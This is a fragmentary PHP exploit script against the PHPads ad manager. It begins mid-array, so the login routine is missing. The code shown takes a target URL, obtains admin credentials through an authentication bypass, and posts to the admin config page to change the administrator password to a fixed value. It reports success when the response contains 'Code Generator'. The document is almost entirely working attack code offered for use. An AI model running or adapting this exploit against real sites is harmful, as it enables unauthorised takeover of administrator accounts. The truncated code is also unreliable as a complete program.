PHPads Authentication Bypass / Administrator Password Change Exploit
'1',
'newlogin' => $username,
'newpass' => "htlover");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_COOKIE, 'user='.$username.'; pass='.$password);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
$result = curl_exec($ch);
if(preg_match("/Code Generator/", $result))
{
return "
Success !! Password changed
username: ".$username." | password: htlover";
}else{
return "Something wrong
";
}
curl_close($ch);
}
if (isset($_POST['submit']))
{
$target = $_POST['target'];
//login($target, $username, $userid);
$logins = login($target);
echo "USERNAME :" . $logins[0]; // username
echo "
PASSWORD :" . $logins[1]; // password
echo adminchange($target.'/admin.php?action=config', $logins[0], $logins[1]);
}
?>